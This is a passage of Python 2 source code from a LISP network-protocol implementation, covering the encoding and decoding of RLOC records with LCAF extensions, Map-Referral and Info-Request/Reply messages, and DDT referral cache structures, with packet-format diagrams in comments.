# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False, True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17,
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
